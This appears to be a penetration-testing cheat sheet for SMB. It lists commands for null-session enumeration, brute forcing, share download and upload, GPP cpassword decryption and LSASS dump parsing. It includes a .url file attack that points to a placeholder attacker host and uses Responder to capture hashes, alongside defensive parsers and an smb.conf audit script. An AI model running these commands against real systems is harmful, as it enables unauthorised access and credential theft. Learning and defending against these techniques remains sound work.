
# Server Message Block

## Footprinting The Service

### Nmap

{% code overflow="wrap" %}

```
sudo nmap 10.129.14.128 -sV -sC -p139,445
```

{% endcode %}

<figure><img src="/files/aIER3zF6bENi6Y877Unb" alt=""><figcaption></figcaption></figure>

### RPCclient

{% code overflow="wrap" %}

```
rpcclient -U "" 10.129.14.128
```

{% endcode %}

<figure><img src="/files/oI8WZfg1O9vuPH8vGiOf" alt=""><figcaption></figcaption></figure>

```
rpcclient -U'%' 10.10.110.17
```

<figure><img src="/files/UVC4PSuKisjEqSO0bCLk" alt=""><figcaption><p><code>-U'%'</code>: Explicitly sends an empty username and no password. <code>-N</code>: Does not send any username or password, attempting to establish a null session.</p></figcaption></figure>

| Query                     | Description                                                        |
| ------------------------- | ------------------------------------------------------------------ |
| `srvinfo`                 | Server information.                                                |
| `enumdomains`             | Enumerate all domains that are deployed in the network.            |
| `querydominfo`            | Provides domain, server, and user information of deployed domains. |
| `netshareenumall`         | Enumerates all available shares.                                   |
| `netsharegetinfo <share>` | Provides information about a specific share.                       |
| `enumdomusers`            | Enumerates all domain users.                                       |
| `queryuser <RID>`         | Provides information about a specific user.                        |
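The following added example (not part of the original notes) parses what rpcclient's `enumdomusers` query prints, so the accounts a null session exposes can be reviewed and compared with what is expected. The output format `user:[NAME] rid:[0xHEX]` is rpcclient's own; the sample lines are constructed, not captured from a host.

```python
"""Parse rpcclient `enumdomusers` output and separate built-in from created accounts.

Added example, not from the original notes. SAMPLE_OUTPUT is constructed.
"""
import re
from typing import Dict, List

# One line of enumdomusers output: user:[Administrator] rid:[0x1f4]
ENUMDOMUSERS_RE = re.compile(r"user:\[(?P<name>[^\]]*)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")

# Relative identifiers that exist in every domain and in every local SAM.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt"}

SAMPLE_OUTPUT = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[jsmith] rid:[0x450]
user:[svc backup] rid:[0x451]
"""

def parse_enumdomusers(text: str) -> Dict[str, int]:
    """Map each account name to its RID as an integer; non-matching lines are ignored."""
    users: Dict[str, int] = {}
    for line in text.splitlines():
        m = ENUMDOMUSERS_RE.search(line)
        if m:
            users[m.group("name")] = int(m.group("rid"), 16)
    return users

def classify(users: Dict[str, int]) -> Dict[str, List[str]]:
    """Split accounts into built-in (RID below 1000) and domain-created (RID 1000 and up)."""
    return {
        "builtin": [name for name, rid in users.items() if rid < 1000],
        "created": [name for name, rid in users.items() if rid >= 1000],
    }

def renamed_builtins(users: Dict[str, int]) -> Dict[str, str]:
    """Accounts whose well-known RID does not match the default name (e.g. a renamed Administrator)."""
    return {
        name: WELL_KNOWN_RIDS[rid]
        for name, rid in users.items()
        if rid in WELL_KNOWN_RIDS and name != WELL_KNOWN_RIDS[rid]
    }

if __name__ == "__main__":
    users = parse_enumdomusers(SAMPLE_OUTPUT)
    print(classify(users))
    print(renamed_builtins(users) or "no renamed built-in accounts")
```

The RID split matters because the RID, not the name, identifies an account: renaming the Administrator account does not hide it from anyone who can list RIDs, and `--rid-brute` style enumeration later on this page works on exactly that fact.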

## Search For Known SMB Version Vulnerabilities

## Check For Shares Using Null Sessions

```
smbclient -N -L //$ip/
```

```
cme smb $ip --shares -u "guest" -p ""
```

## Brute Forcing

```
cme smb $ip -u users.list -p pws.list --local-auth | grep '[+]'
```

<figure><img src="/files/IjgKBvf77iz3GX6u1IAm" alt=""><figcaption><p>If the target</p></figcaption></figure>

## URL File attacks

*Test for URL file attacks by creating a file called `@somename.url` with the following contents, uploading it to a writable share, and spinning up an SMB server to capture the hash*

```
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\EnterAttackerip\%USERNAME%.icon
IconIndex=1
```

*Run Responder to capture hashes*

```
/opt/Responder-3.1.3.0/Responder.py -I tun0
```
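The added example below (not from the original notes) is the defender's side of the technique just described: a shortcut with a UNC `IconFile` planted on a writable share makes Explorer authenticate to that host as soon as the folder is viewed, so a periodic scan of share contents for such files is a cheap detection. The sample shortcut is constructed and `PLACEHOLDER-HOST` stands in for a host name.

```python
"""Flag Windows .url shortcut files whose fields point at a UNC path.

Added example, not from the original notes. SAMPLE_URL_FILE is constructed.
"""
import configparser
import re
from pathlib import Path
from typing import Dict, List, Tuple

# \\host\share\... : a UNC path that Explorer resolves over SMB when rendering the shortcut.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")
# Fields Explorer dereferences; keys are lower-cased because INI field names are case-insensitive.
WATCHED_KEYS = ("iconfile", "url", "workingdirectory")

SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\PLACEHOLDER-HOST\%USERNAME%.icon
IconIndex=1
"""

def parse_url_file(text: str) -> Dict[str, str]:
    """Return the [InternetShortcut] section with lower-cased keys; {} if it is absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    for name in cp.sections():
        if name.lower() == "internetshortcut":
            return dict(cp.items(name))
    return {}

def find_unc_references(text: str) -> List[Tuple[str, str]]:
    """Return (field, value) pairs whose value is a UNC path."""
    section = parse_url_file(text)
    return [(k, section[k]) for k in WATCHED_KEYS if k in section and UNC_RE.match(section[k])]

def scan_directory(root: Path) -> Dict[str, List[Tuple[str, str]]]:
    """Walk a share mirror (or collected files) and report every .url with a UNC reference."""
    findings: Dict[str, List[Tuple[str, str]]] = {}
    for path in root.rglob("*.url"):
        try:
            hits = find_unc_references(path.read_text(encoding="utf-8", errors="replace"))
        except configparser.Error:
            continue  # not a valid INI-style shortcut; nothing to evaluate
        if hits:
            findings[str(path)] = hits
    return findings

if __name__ == "__main__":
    for field, value in find_unc_references(SAMPLE_URL_FILE):
        print(f"UNC reference in {field}: {value}")
```

A local path such as `C:\Windows\notepad.exe` or an `https://` URL is not reported, so the check is specific to shortcuts that force an outbound SMB connection; the same check is what a share-monitoring job would run, and blocking outbound SMB from workstations removes the credential leak even where such a file is present.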

## Read / Upload access

*Attempt to download and view share contents using valid credentials / anonymous login / null session*

```
smbmap -H $ip
```

<figure><img src="/files/4V0w0WE3Gz9IvZxB6FfF" alt=""><figcaption></figcaption></figure>

```
smbmap -H $ip -r
```

<figure><img src="/files/cvVFvE26MhPP7wCPmXIj" alt=""><figcaption><p>Using <code>smbmap</code> with the <code>-r</code> or <code>-R</code> (recursive) option, one can browse the directories</p></figcaption></figure>

```
smbmap -H 10.129.14.128 --download "notes\note.txt"
```

<figure><img src="/files/F9mB2mOzWK5tIYJwIQGC" alt=""><figcaption><p>Downloading</p></figcaption></figure>

```
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
```

<figure><img src="/files/ybC2WLFDcqfC5gEbv5BK" alt=""><figcaption><p>Uploading</p></figcaption></figure>

```
smbmap -u guest -p "" -H $ip -A '.*' -R
```

## Cpassword discovery

*Search the shares for `Groups.xml` (Group Policy Preferences) and decrypt any `cpassword` value it contains*

```
gpp-decrypt cpassword
```

## lsass.zip lsass.dmp

*Search the shares for `lsass.zip` or `lsass.dmp`; an LSASS memory dump can be parsed offline to dump credentials / keys / tickets*

```
unzip lsass.zip                      # extract first; pypykatz reads the raw minidump
pypykatz lsa minidump lsass.dmp
```

## Alternate Data Streams (ADS)

*Test for alternate data streams after discovering 0-byte files (run `allinfo` inside an smbclient session)*

```
allinfo filename
```

## Check Password Policy

```
cme smb $ip --pass-pol -u guest -p ""
```

## User Discovery

*Check for users using valid credentials / anonymous login / null session*

```
cme smb $ip --users -u guest -p ""
```

```
cme smb $ip --rid-brute -u guest -p ""
```

## Group discovery

*Check for groups using valid credentials / anonymous login / null session*

```
cme smb $ip --groups -u guest -p ""
```

## Smbclient

*Interactively access the SMB shares using smbclient*

```
smbclient //$ip/someshare -N
```

```
smbclient //$ip/someshare -U 'guest' -N
```

```
smbclient //$ip/someshare -U 'validuser%validpass'   # -p is the port option; the password goes after % in -U
```


## Dangerous Settings

| Setting                     | Description                                                                 |
| --------------------------- | --------------------------------------------------------------------------- |
| `browseable = yes`          | Lists the share to every client that can connect.                           |
| `read only = no`            | Allows clients to create and modify files (the share is not read-only).     |
| `writable = yes`            | Allows users to create and modify files (the inverse of `read only`).       |
| `guest ok = yes`            | Allows connecting to the share without a password.                          |
| `enable privileges = yes`   | Honours privileges assigned to specific SIDs.                               |
| `create mask = 0777`        | Newly created files are world-readable, world-writable and executable.      |
| `directory mask = 0777`     | Newly created directories are world-readable and world-writable.            |
| `logon script = script.sh`  | Script executed on the user's logon.                                        |
| `magic script = script.sh`  | Script the server executes when the client closes that file.                |
| `magic output = script.out` | File in which the output of the magic script is stored.                     |
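The following added example (not part of the original notes, and not Samba code) audits an `smb.conf` for the settings in the table above. It goes a little beyond the table: `[global]` values are applied to every share that does not override them, as Samba does, the spellings `writeable` and `public` are treated as the synonyms they are, and the masks are flagged whenever the world-writable bit is set rather than only for the exact value `0777`. The sample configuration is constructed.

```python
"""Audit a Samba smb.conf for the risky share settings listed above.

Added example, not from the original notes or from Samba. SAMPLE_CONF is constructed.
"""
import configparser
from typing import Dict, List, Tuple

TRUE_WORDS = {"yes", "true", "1"}
FALSE_WORDS = {"no", "false", "0"}
# Alternative spellings Samba accepts for the same parameter.
SYNONYMS = {"writeable": "writable", "public": "guest ok"}
# Boolean parameters and the value that weakens the share.
RISKY_BOOLEANS = {
    "browseable": ("yes", "share is listed to every client that can connect"),
    "read only": ("no", "clients may create and modify files"),
    "guest ok": ("yes", "no password is needed to connect"),
    "enable privileges": ("yes", "privileges assigned to SIDs are honoured"),
}
MASK_KEYS = ("create mask", "directory mask")
SCRIPT_KEYS = ("logon script", "magic script", "magic output")

Finding = Tuple[str, str, str]  # (parameter, value as written, reason)

SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   create mask = 0777

[public]
   path = /srv/samba/public
   browseable = yes
   public = yes
   writeable = yes
   magic script = script.sh

[private]
   path = /srv/samba/private
   browseable = no
   read only = yes
   create mask = 0660
"""

def normalise_bool(value: str) -> str:
    """Map Samba's accepted boolean spellings onto 'yes'/'no'; other values pass through."""
    v = value.strip().lower()
    if v in TRUE_WORDS:
        return "yes"
    if v in FALSE_WORDS:
        return "no"
    return v

def load_smb_conf(text: str) -> configparser.ConfigParser:
    # Treating [global] as the defaults section gives exactly Samba's inheritance rule.
    cp = configparser.ConfigParser(interpolation=None, strict=False, default_section="global")
    # Parameter names are case-insensitive; collapse whitespace so "read  only" still matches.
    cp.optionxform = lambda k: " ".join(k.lower().split())
    cp.read_string(text)
    return cp

def audit_share(cp: configparser.ConfigParser, share: str) -> List[Finding]:
    """Findings for one share, including values inherited from [global]."""
    findings: Dict[str, Finding] = {}
    for key, raw in cp.items(share):
        key = SYNONYMS.get(key, key)
        value = normalise_bool(raw)
        if key == "writable":  # writable = yes means the same as read only = no
            key, value = "read only", ("no" if value == "yes" else "yes")
        if key in RISKY_BOOLEANS:
            risky, reason = RISKY_BOOLEANS[key]
            if value == risky:
                findings[key] = (key, raw.strip(), reason)
        elif key in MASK_KEYS:
            try:
                mode = int(value, 8)
            except ValueError:
                continue  # not an octal mode; leave it for a human
            if mode & 0o002:  # world-writable bit set; 0777 is the extreme case
                findings[key] = (key, raw.strip(), "new entries are world-writable")
        elif key in SCRIPT_KEYS:
            findings[key] = (key, raw.strip(), "server-side script hook is configured")
    return list(findings.values())

def audit_config(text: str) -> Dict[str, List[Finding]]:
    """Findings per share; shares with nothing to report are omitted."""
    cp = load_smb_conf(text)
    report: Dict[str, List[Finding]] = {}
    for share in cp.sections():
        found = audit_share(cp, share)
        if found:
            report[share] = found
    return report

if __name__ == "__main__":
    for share, found in audit_config(SAMPLE_CONF).items():
        for key, value, reason in found:
            print(f"[{share}] {key} = {value}: {reason}")
```

In the sample, `[public]` is reported for the inherited `create mask = 0777` as well as for its own `browseable`, `public`, `writeable` and `magic script` lines, while `[private]` overrides the mask and stays read-only, so it produces nothing.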

